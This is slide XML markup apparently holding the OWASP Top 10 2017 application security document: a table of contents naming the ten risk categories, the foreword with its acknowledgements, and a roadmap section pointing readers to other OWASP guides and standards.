                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="4000" dirty="0"/>
              <a:t>TOC</a:t>
            </a:r>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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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137410131"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="595884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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="384464">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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TOC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About OWASP	………………………………</a:t>
                      </a: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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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FW	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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Foreword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I	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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Introduction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RN	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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Release Notes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Risk	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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Security Risks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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	T10	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-	OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Application Security				Risks – 2017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A1:2017	-	Injection	…….</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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A2:2017	-	Broken Authentication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A3:2017	-	Sensitive Data Exposure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10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A4:2017	-	XML External Entities (XXE)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11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A5:2017	-	Broken Access Control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A6:2017	-	Security Misconfiguration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A7:2017	-	Cross-Site Scripting (XSS)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A8:2017	-	Insecure Deserialization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A9:2017	-	Using Components with Known</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US"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Vulnerabilities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	-	Insufficient Logging &amp; Monitoring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+D	-	What’s Next for Developers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+T	-	What’s Next for Security Testing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+O	-	What’s Next for Organizations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20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	-	What’s Next for Application Managers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21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1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+R	-	Note About Risks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+RF	-	Details About Risk Factors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+Dat	-	Methodology and Data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880000" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" noProof="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+Ack	-	Acknowledgements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18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23"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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1909233709"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8153137"/>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259343">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Foreword</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817857">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software becomes increasingly critical, complex, and connected, the difficulty of achieving application security increases exponentially. The rapid pace of modern software development processes makes risks even more critical to discover quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A great deal of feedback was received during the creation of the OWASP Top 10 2017, more than for any other equivalent OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers, it has become </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de facto application security standard. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We have taken steps in this release to firm up the definition of issues, and improve the recommendations to be leading practices that may be adopted as an application security standard that covers off around 80-90% of all common attacks and threats. We encourage large and high performing organizations to use the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> if a true standard is required, but for most, the OWASP Top 10 is a great start on the application security journey.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including "What's next for developers", "What's next for testers", "What's next for organizations" which is suitable for CIO's and CISO's, "What's next for application managers", which is suitable for application owners.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your organization's existing strengths to do and measure what works for you.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="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smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>You can find OWASP Top 10 project and translations here:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="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smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wichers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and Jeff Williams for all their efforts, and believing in us to get this finished with the community's help. Thank you!</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Glas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Smithline</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew van der Stock</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4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>FW</a:t>
            </a:r>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Foreword</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872923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377989715"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="532914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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="324000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Roadmap for future activities</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="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4993860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just"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Don't stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just"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Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. The OWASP Top 10 will continue to change. Even without changing a single line of your application's code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in “What's Next For Developers, Testers, and Organizations” for more information.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>When you're ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP is maintaining and promoting the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> as a guide to organizations and application reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just"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Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Security vulnerabilities can be quite complex and deeply buried in code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Focus on making security an integral part of your culture throughout your development organization. Find out more in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
